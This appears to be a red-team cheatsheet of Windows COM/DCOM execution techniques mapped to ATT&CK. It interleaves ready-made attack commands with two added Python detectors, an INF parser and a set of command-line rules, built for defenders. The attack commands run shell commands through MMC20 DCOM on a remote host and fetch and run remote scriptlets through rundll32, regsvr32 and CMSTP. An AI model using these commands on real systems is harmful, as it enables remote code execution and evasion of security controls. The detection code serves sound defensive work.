COM Execution - T1559.001
Templates and methods of quickly executing COM and DCOM
Windows Component Object Model quick execution cheatsheet
PowerShell
Using PowerShell with .NET type notation to quickly create a COM or DCOM instance from either a CLSID or a ProgID
Execution via CLSID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
Execution via ProgID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
DCOM Execution
Distributed COM (DCOM) is an extension of COM which, among other things, enables instantiation and invocation of COM objects on a remote host. Note that DCOM can also be used locally by specifying the loopback address (127.0.0.1) as the server.
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
Rundll32
Execution via CLSID
Rundll32.exe -sta {GUID}
Execution via ProgID
Rundll32.exe -sta Scripting.Dictionary
Execution via shell32.dll
# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}
Scriptlet Execution from Remote Server
# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://127.0.0.1:8080/calc.sct").Exec();
Remote Scriptlet via INF file
# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1
Regsvr32
COM Local Scriptlet Execution
# Running Scriptlet locally // without touching the registry
regsvr32 /s /n /u /i:malware.sct
COM Scriptlet Execution from Remote Server
# COM Scriptlet via Regsvr32 from remote location // without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll
CMSTP
Execution via INF file that downloads and executes a scriptlet (sct)
# INF File
# Running Scriptlet via CMSTP.exe INF-SCT file
[version]
Signature=$Chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"
cmstp.exe /su test.inf
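The INF above works because the [UnRegisterOCXs] directive hands scrobj.dll a URL as its argument, so the scriptlet is fetched and run while CMSTP unregisters the "OCX". A defender reviewing INF files dropped on disk or passed to cmstp.exe can check for exactly that shape. The following Python is an added example and not part of this cheatsheet: it parses INF sections, follows RegisterOCXs/UnRegisterOCXs keys to their target section, and flags any entry that names scrobj.dll or carries a URL or .sct argument. The suspicious sample is the page's own INF; the benign sample and the function names are constructed for the example.

```python
import re

# The INF from this page, embedded as a constructed sample.
SUSPICIOUS_INF = r"""[version]
Signature=$Chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"
"""

# Constructed benign INF: only copies a profile file, no OCX registration at all.
BENIGN_INF = r"""[version]
Signature=$Chicago$
AdvancedINF=2.5
[DefaultInstall]
CopyFiles=Files.Copy
[Files.Copy]
vpn.cms
"""

# INF keys whose target section lists DLLs that get (un)registered via DllRegisterServer
# style calls; scrobj.dll in that position executes a scriptlet.
OCX_KEYS = ("registerocxs", "unregisterocxs")


def parse_inf(text):
    """Return {section_name_lower: [lines]} with INF ';' comments and blanks removed."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts an INF comment
        if not line:
            continue
        header = re.match(r"\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()  # section names are case-insensitive
            sections.setdefault(current, [])
            continue
        if current is not None:
            sections[current].append(line)
    return sections


def find_scriptlet_ocx(sections):
    """Follow every (Un)RegisterOCXs key and flag scrobj.dll / URL / .sct entries."""
    findings = []
    for install_section, lines in sections.items():
        for line in lines:
            if "=" not in line:
                continue
            key, _, target = line.partition("=")
            if key.strip().lower() not in OCX_KEYS:
                continue
            for entry in sections.get(target.strip().lower(), []):
                # Entry format: <dll>,<flags>,<argument passed to the register call>
                parts = [p.strip() for p in entry.split(",")]
                dll = parts[0]
                argument = parts[2] if len(parts) > 2 else ""
                if dll.lower().endswith("scrobj.dll") or re.search(r"https?://|\.sct\b", argument, re.I):
                    findings.append({"install_section": install_section,
                                     "ocx_section": target.strip(),
                                     "dll": dll, "argument": argument})
    return findings


if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_INF), ("benign", BENIGN_INF)):
        print(label, find_scriptlet_ocx(parse_inf(text)))
```

The same walk applies to INF files launched through rundll32 advpack.dll,LaunchINFSection (above), since both paths honour the same OCX registration keys.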
PyCOM
Verclsid
Execution via CLSID
verclsid.exe /S /C {CLSID}
Xwizard
Execution via CLSID
xwizard.exe RunWizard /taero /u {CLSID}
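Every command in the PowerShell, Rundll32, Regsvr32, CMSTP, Verclsid and Xwizard sections above leaves a distinctive command line behind in process-creation telemetry (and, for the PowerShell variants, in script-block logging). The following Python is an added example, not part of this cheatsheet: it runs a small rule set over constructed sample events whose command lines are the ones listed on this page plus two ordinary administrative uses for contrast, tags each hit with the ATT&CK technique the page assigns to that binary, and pulls out the CLSID so an analyst can resolve it under HKCR\CLSID. The event shape (image + command line), the image paths and the rule names are assumptions made for the example.

```python
import re

# Constructed sample events (process-creation and PowerShell script-block records
# reduced to image + command line); not real telemetry. Events 1-7 are the command
# lines from this page, 8 and 9 are ordinary administrative uses for contrast.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://127.0.0.1:8080/calc.sct").Exec();'},
    {"id": 2, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,SHCreateLocalServerRunDll {49B2791A-B1AE-4C90-9B8E-E860BA07F889}"},
    {"id": 3, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll"},
    {"id": 4, "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /su test.inf"},
    {"id": 5, "image": r"C:\Windows\System32\verclsid.exe",
     "cmdline": r"verclsid.exe /S /C {49B2791A-B1AE-4C90-9B8E-E860BA07F889}"},
    {"id": 6, "image": r"C:\Windows\System32\xwizard.exe",
     "cmdline": r"xwizard.exe RunWizard /taero /u {49B2791A-B1AE-4C90-9B8E-E860BA07F889}"},
    {"id": 7, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))'},
    {"id": 8, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"},
    {"id": 9, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

# (rule name, image regex, command-line regex, ATT&CK technique as listed on this page)
RULES = [
    ("rundll32 scriptlet via javascript: moniker", r"rundll32",
     r"javascript:.*GetObject\(|mshtml,RunHTMLApplication", "T1218.011"),
    ("rundll32 COM server launch by CLSID", r"rundll32",
     r"-sta\s|SHCreateLocalServerRunDll", "T1218.011 / T1559.001"),
    ("rundll32 INF section launch via advpack", r"rundll32",
     r"advpack\.dll,LaunchINFSection", "T1218.011"),
    ("regsvr32 scriptlet (scrobj.dll or /i: URL)", r"regsvr32",
     r"/i:\S*\.sct|/i:https?://|scrobj\.dll", "T1218.010"),
    ("cmstp INF install", r"cmstp", r"/(s|su|ni)\b.*\.inf", "T1218.003"),
    ("verclsid invoked on an explicit CLSID", r"verclsid", r"/C\s*\{", "T1218.012"),
    ("xwizard RunWizard with caller-supplied CLSID", r"xwizard",
     r"RunWizard.*/u\s*\{", "T1559.001"),
    # A second argument to GetTypeFromCLSID/GetTypeFromProgID is the DCOM server name.
    ("PowerShell DCOM instantiation against a named host", r"powershell|pwsh",
     r"GetTypeFrom(CLSID|ProgID)\([^)]*,", "T1559.001 / T1059.001"),
]

CLSID_RE = re.compile(r"[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}", re.I)


def extract_clsid(cmdline):
    """Return the first CLSID in a command line (for lookup under HKCR\\CLSID), or None."""
    m = CLSID_RE.search(cmdline)
    return m.group(0).upper() if m else None


def classify(event):
    """Return [(rule name, technique)] for every rule whose image and cmdline patterns match."""
    hits = []
    for name, image_re, cmd_re, technique in RULES:
        if re.search(image_re, event["image"], re.I) and re.search(cmd_re, event["cmdline"], re.I):
            hits.append((name, technique))
    return hits


def scan(events):
    """Map event id -> hits; an empty list means no rule fired."""
    return {e["id"]: classify(e) for e in events}


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        hits = classify(event)
        clsid = extract_clsid(event["cmdline"])
        verdict = "; ".join(f"{n} [{t}]" for n, t in hits) or "no rule fired"
        print(f"event {event['id']}: {verdict}" + (f" (CLSID {clsid})" if clsid else ""))
```

The rules key on the tokens that have no place in legitimate use of these binaries (a URL or .sct after /i:, scrobj.dll, a javascript: moniker, a CLSID handed to verclsid or xwizard, a host name in a GetTypeFrom* call) rather than on the binary alone, which is why events 8 and 9 stay quiet.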
ATT&CK Techniques in this Page
Command and Scripting Interpreter: PowerShell - T1059.001
Inter-Process Communication: Component Object Model - T1559.001
System Binary Proxy Execution: CMSTP - T1218.003
System Binary Proxy Execution: Rundll32 - T1218.011
System Binary Proxy Execution: Verclsid - T1218.012
System Binary Proxy Execution: Regsvr32 - T1218.010